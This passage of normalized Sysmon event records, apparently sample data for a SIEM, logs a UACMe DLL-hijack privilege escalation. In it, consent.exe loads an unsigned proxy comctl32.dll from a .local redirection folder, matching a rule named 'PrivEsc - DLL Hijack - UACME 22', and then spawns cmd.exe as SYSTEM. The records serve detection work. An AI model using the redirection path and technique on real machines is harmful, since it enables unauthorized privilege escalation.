15:01:49.263\",\"Name\":\"UtcTime\"},{\"text\":\"{20fff121-f8dd-647d-8401-000000003900}\",\"Name\":\"ProcessGuid\"},{\"text\":\"2328\",\"Name\":\"ProcessId\"},{\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe\",\"Name\":\"Image\"},{\"text\":\"10.0.17763.3232 (WinBuild.160101.0800)\",\"Name\":\"FileVersion\"},{\"text\":\"Consent UI for administrative applications\",\"Name\":\"Description\"},{\"text\":\"Microsoft® Windows® Operating System\",\"Name\":\"Product\"},{\"text\":\"Microsoft Corporation\",\"Name\":\"Company\"},{\"text\":\"consent.exe\",\"Name\":\"OriginalFileName\"},{\"text\":\"consent.exe 368 272 00000285D6BE22C0\",\"Name\":\"CommandLine\"},{\"text\":\"C:\\\\Windows\\\\system32\\\\\",\"Name\":\"CurrentDirectory\"},{\"text\":\"NT 
AUTHORITY\\\\SYSTEM\",\"Name\":\"User\"},{\"text\":\"{20fff121-f3f7-647d-e703-000000000000}\",\"Name\":\"LogonGuid\"},{\"text\":\"0x3e7\",\"Name\":\"LogonId\"},{\"text\":\"1\",\"Name\":\"TerminalSessionId\"},{\"text\":\"System\",\"Name\":\"IntegrityLevel\"},{\"text\":\"MD5=C67713C28BB97E685FEB88FFAEB96788,SHA256=6272541FD22C1D9B5DFE9364A0A1D6B12BBCAA28EFA0504E3A344E967AEA9C5C,IMPHASH=1275A84E15AAA739F3099F6A73D7D6FA\",\"Name\":\"Hashes\"},{\"text\":\"{20fff121-f3f8-647d-1300-000000003900}\",\"Name\":\"ParentProcessGuid\"},{\"text\":\"368\",\"Name\":\"ParentProcessId\"},{\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"Name\":\"ParentImage\"},{\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p\",\"Name\":\"ParentCommandLine\"},{\"text\":\"NT AUTHORITY\\\\SYSTEM\",\"Name\":\"ParentUser\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield1": "999", "datafield10": "consent.exe", "datafield19": "consent.exe (2328) ← svchost.exe (368) ← services.exe (648) ← wininit.exe (520) ← smss.exe (408) ← smss.exe (324)", "datafield2": "368", "datafield3": "c:\\windows\\system32\\", "datafield4": "svchost.exe", "datafield5": "consent.exe 368 272 00000285D6BE22C0", "datafield6": "20fff121-f3f7-647d-e703-000000000000", "datafield7": "999", "datafield8": "20fff121-f8dd-647d-8401-000000003900", "datafield9": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p", "event_src.asset": "1864e292-4880-0001-0000-000000000007", "event_src.category": "Other", "event_src.fqdn": "wks05.example.com", "event_src.host": "wks05.example.com", "event_src.hostname": "wks05", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2916", "historical": false, "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "incorrect_time": false, "input_id": 
"00000000-0000-0000-0000-000000000000", "job_id": "692db8c2-9d54-11eb-a8b3-0242ac130003", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.provider": "local", "object.account.session_id": "999", "object.hash": "6272541FD22C1D9B5DFE9364A0A1D6B12BBCAA28EFA0504E3A344E967AEA9C5C", "object.id": "2328", "object.name": "consent.exe", "object.path": "c:\\windows\\system32\\", "object.process.chain": "consent.exe ← svchost.exe ← services.exe ← wininit.exe ← smss.exe ← smss.exe", "object.process.cmdline": "consent.exe 368 272 00000285D6BE22C0", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\consent.exe", "object.process.guid": "20fff121-f8dd-647d-8401-000000003900", "object.process.hash": "IMPHASH:1275A84E15AAA739F3099F6A73D7D6FA MD5:C67713C28BB97E685FEB88FFAEB96788 SHA256:6272541FD22C1D9B5DFE9364A0A1D6B12BBCAA28EFA0504E3A344E967AEA9C5C", "object.process.hash.imphash": "1275A84E15AAA739F3099F6A73D7D6FA", "object.process.hash.md5": "C67713C28BB97E685FEB88FFAEB96788", "object.process.hash.sha256": "6272541FD22C1D9B5DFE9364A0A1D6B12BBCAA28EFA0504E3A344E967AEA9C5C", "object.process.id": "2328", "object.process.meta": "Description:Consent UI for administrative applications | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "consent.exe", "object.process.original_name": "consent.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p", "object.process.parent.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.parent.guid": "20fff121-f3f8-647d-1300-000000003900", "object.process.parent.id": "368", "object.process.parent.name": "svchost.exe", "object.process.parent.path": "c:\\windows\\system32\\", 
"object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.3232 (WinBuild.160101.0800)", "object.property": "metadata", "object.value": "Description:Consent UI for administrative applications | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.version": "10.0.17763.3232 (WinBuild.160101.0800)", "origin_app_alias": "MP-1", "origin_app_id": "185957ea-0f40-0001-0000-000000000002", "primary_siem_app_alias": "MP-1", "primary_siem_app_id": "185957ea-0f40-0001-0000-000000000002", "recv_asset": "1864e292-4880-0001-0000-000000000007", "recv_host": "wks05", "recv_ipv4": "1.2.3.4", "remote": false, "scope_id": "00000000-0000-0000-0000-000000000005", "siem_alias": "1.2.3.4", "siem_id": "e944c6fa-4174-4bb7-afae-98b42faee6b2", "site_address": "unknown site_id=null", "site_alias": "unknown site_id=null", "site_name": "unknown site_id=null", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "subject.domain": "nt authority", "subject.name": "system", "subject.state": "on behalf of oneself", "tag": "wineventlog", "taxonomy_version": "26.0.215-release-26.0", "tenant_id": "00000000-0000-0000-0000-000000000000", "time": "2023-06-05T15:01:49.263Z", "uuid": "01da0c76-03b2-01ee-8c68-005056825a53" } +{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:55.4089224Z\"},\"EventRecordID\":\"5455\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:55.376\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-7957-5d45-0000-00100e620a01}\"},{\"Name\":\"ProcessId\",\"text\":\"3116\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Consent UI for administrative applications\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"consent.exe 896 272 00000280644BCAF0\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT 
AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-d4e9-5d45-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=9329B2362078DE27242DD4534F588AF3264BF0BF,MD5=27992D7EBE51AEC655A088DE88BAD5C9,SHA256=8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6,IMPHASH=522D83761201075834F05037F5307949\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-5769-5d45-0000-001044e83300}\"},{\"Name\":\"ParentProcessId\",\"text\":\"896\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Appinfo\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-d4e9-5d45-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "consent.exe 896 272 00000280644BCAF0", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\consent.exe", "object.process.guid": "747f3d96-7957-5d45-0000-00100e620a01", "object.process.hash.imphash": 
"522D83761201075834F05037F5307949", "object.process.hash.md5": "27992D7EBE51AEC655A088DE88BAD5C9", "object.process.hash.sha1": "9329B2362078DE27242DD4534F588AF3264BF0BF", "object.process.hash.sha256": "8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6", "object.process.id": "3116", "object.process.meta": "Description:Consent UI for administrative applications | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "consent.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Appinfo", "object.process.parent.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.parent.guid": "747f3d96-5769-5d45-0000-001044e83300", "object.process.parent.id": "896", "object.process.parent.name": "svchost.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.266Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:55.376Z", "type": "raw", "uuid": "307840cf-68d8-4456-803b-09d028088acc"} +{"action": "access", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"10\",\"Version\":\"3\",\"Level\":\"4\",\"Task\":\"10\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:23.5551743Z\"},\"EventRecordID\":\"5453\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:23.377\"},{\"Name\":\"SourceProcessGUID\",\"text\":\"{747f3d96-7934-5d45-0000-0010cab90701}\"},{\"Name\":\"SourceProcessId\",\"text\":\"7564\"},{\"Name\":\"SourceThreadId\",\"text\":\"7188\"},{\"Name\":\"SourceImage\",\"text\":\"C:\\\\Windows\\\\system32\\\\consent.exe\"},{\"Name\":\"TargetProcessGUID\",\"text\":\"{747f3d96-7937-5d45-0000-00100d290801}\"},{\"Name\":\"TargetProcessId\",\"text\":\"4192\"},{\"Name\":\"TargetImage\",\"text\":\"C:\\\\Windows\\\\system32\\\\cmd.exe\"},{\"Name\":\"GrantedAccess\",\"text\":\"0x1fffff\"},{\"Name\":\"CallTrace\",\"text\":\"C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+a0fb4|C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+47241|C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+46196|C:\\\\Windows\\\\System32\\\\KERNEL32.DLL+1c2e3|UNKNOWN(000001611150B621)|UNKNOWN(000001611150B621)|C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+48f07|C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+44865|C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+44648|C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+44672|C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+d62ca|C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+c3879|C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+756c3|C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+7566e\"}]}}}", "category.generic": "Process", "category.high": "System Management", "category.low": 
"Manipulation", "datafield5": "7188", "datafield9": "C:\\Windows\\SYSTEM32\\ntdll.dll+a0fb4|C:\\Windows\\System32\\KERNELBASE.dll+47241|C:\\Windows\\System32\\KERNELBASE.dll+46196|C:\\Windows\\System32\\KERNEL32.DLL+1c2e3|UNKNOWN(000001611150B621)|UNKNOWN(000001611150B621)|C:\\Windows\\SYSTEM32\\ntdll.dll+48f07|C:\\Windows\\SYSTEM32\\ntdll.dll+44865|C:\\Windows\\SYSTEM32\\ntdll.dll+44648|C:\\Windows\\SYSTEM32\\ntdll.dll+44672|C:\\Windows\\SYSTEM32\\ntdll.dll+d62ca|C:\\Windows\\SYSTEM32\\ntdll.dll+c3879|C:\\Windows\\SYSTEM32\\ntdll.dll+756c3|C:\\Windows\\SYSTEM32\\ntdll.dll+7566e", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_10_Process_access", "importance": "low", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "10", "normalized": true, "object": "process", "object.process.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.guid": "747f3d96-7937-5d45-0000-00100d290801", "object.process.id": "4192", "object.process.name": "cmd.exe", "object.process.path": "c:\\windows\\system32\\", "object.property": "GrantedAccess", "object.value": "0x1fffff", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.266Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\windows\\system32\\consent.exe", "subject.process.guid": "747f3d96-7934-5d45-0000-0010cab90701", "subject.process.id": "7564", "subject.process.name": "consent.exe", "subject.process.path": "c:\\windows\\system32\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:23.377Z", "type": "raw", "uuid": 
"6495c614-7815-48db-b001-15f7a3b97059"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:23.5547781Z\"},\"EventRecordID\":\"5452\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:23.391\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-7937-5d45-0000-00100d290801}\"},{\"Name\":\"ProcessId\",\"text\":\"4192\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Windows Command Processor\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT 
AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-d4e9-5d45-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-7934-5d45-0000-0010cab90701}\"},{\"Name\":\"ParentProcessId\",\"text\":\"7564\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"consent.exe 896 272 00000280644BC500\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-d4e9-5d45-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "\"C:\\Windows\\system32\\cmd.exe\"", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.guid": "747f3d96-7937-5d45-0000-00100d290801", "object.process.hash.imphash": "272245E2988E1E430500B852C4FB5E18", 
"object.process.hash.md5": "975B45B669930B0CC773EAF2B414206F", "object.process.hash.sha1": "8C5437CD76A89EC983E3B364E219944DA3DAB464", "object.process.hash.sha256": "3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2", "object.process.id": "4192", "object.process.meta": "Description:Windows Command Processor | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "cmd.exe", "object.process.parent.cmdline": "consent.exe 896 272 00000280644BC500", "object.process.parent.fullpath": "c:\\windows\\system32\\consent.exe", "object.process.parent.guid": "747f3d96-7934-5d45-0000-0010cab90701", "object.process.parent.id": "7564", "object.process.parent.name": "consent.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.266Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:23.391Z", "type": "raw", "uuid": "32c28c58-c00a-498a-9029-76636a5f0bb7"} +{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"7\",\"Version\":\"3\",\"Level\":\"4\",\"Task\":\"7\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:23.5243142Z\"},\"EventRecordID\":\"5451\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\",\"text\":\"PrivEsc - DLL Hijack - UACME 22\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:23.363\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-7934-5d45-0000-0010cab90701}\"},{\"Name\":\"ProcessId\",\"text\":\"7564\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe\"},{\"Name\":\"ImageLoaded\",\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe.local\\\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.615_none_05b4414a072024d4\\\\comctl32.dll\"},{\"Name\":\"FileVersion\",\"text\":\"3.1.8.1904\"},{\"Name\":\"Description\",\"text\":\"UACMe proxy DLL\"},{\"Name\":\"Product\",\"text\":\"UACMe\"},{\"Name\":\"Company\",\"text\":\"Hazardous Environments\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A309A622B9D4A62CFE59B73FDD32BD8384E66628,MD5=9E5AED3F57CEBC5154F9373B2BB9BA05,SHA256=FF40C2F8E6635F4D33997EB928C72C1293C5A844185DFDD3FD444FFD8C959E80,IMPHASH=1C6B5C991BBBDC2B578EA7DEEF4AFA1B\"},{\"Name\":\"Signed\",\"text\":\"false\"},{\"Name\":\"Signature\"},{\"Name\":\"SignatureStatus\",\"text\":\"Unavailable\"}]}}}", "category.generic": "Executable Module", "category.high": "Availability Management", "category.low": "Control", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.rule": 
"PrivEsc - DLL Hijack - UACME 22", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_7_Image_loaded", "importance": "low", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "7", "normalized": true, "object": "module", "object.process.fullpath": "c:\\windows\\system32\\consent.exe.local\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.615_none_05b4414a072024d4\\comctl32.dll", "object.process.hash.imphash": "1C6B5C991BBBDC2B578EA7DEEF4AFA1B", "object.process.hash.md5": "9E5AED3F57CEBC5154F9373B2BB9BA05", "object.process.hash.sha1": "A309A622B9D4A62CFE59B73FDD32BD8384E66628", "object.process.hash.sha256": "FF40C2F8E6635F4D33997EB928C72C1293C5A844185DFDD3FD444FFD8C959E80", "object.process.meta": "Description:UACMe proxy DLL | Product:UACMe | Company:Hazardous Environments", "object.process.name": "comctl32.dll", "object.process.path": "c:\\windows\\system32\\consent.exe.local\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.615_none_05b4414a072024d4\\", "object.property": "signature status", "object.value": "not signed", "object.version": "3.1.8.1904", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.266Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\windows\\system32\\consent.exe", "subject.process.guid": "747f3d96-7934-5d45-0000-0010cab90701", "subject.process.id": "7564", "subject.process.name": "consent.exe", "subject.process.path": "c:\\windows\\system32\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:23.363Z", "type": "raw", "uuid": "4d0abd6d-a99b-4817-a3e0-6438c1b28920"} +{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:21.9545970Z\"},\"EventRecordID\":\"5450\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:21.036\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-7935-5d45-0000-001066ca0701}\"},{\"Name\":\"ProcessId\",\"text\":\"7324\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\WerFault.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Windows Problem Reporting\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\WerFault.exe -u -p 7564 -s 152\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT 
AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-d4e9-5d45-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=1B59C8D752E031AF4C6B0B02F3780E7156AAEECF,MD5=603A88C6EC5CA36FC9C382F9A2EA9105,SHA256=DFAE5391EA274620F2B025976DC9787051EE416AEB360F68F20B108323924955,IMPHASH=3B9DE67ACC19291D79083D12452FA5BA\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-7934-5d45-0000-0010cab90701}\"},{\"Name\":\"ParentProcessId\",\"text\":\"7564\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"consent.exe 896 272 00000280644BC500\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-d4e9-5d45-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "C:\\Windows\\system32\\WerFault.exe -u -p 7564 -s 152", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\werfault.exe", "object.process.guid": "747f3d96-7935-5d45-0000-001066ca0701", "object.process.hash.imphash": 
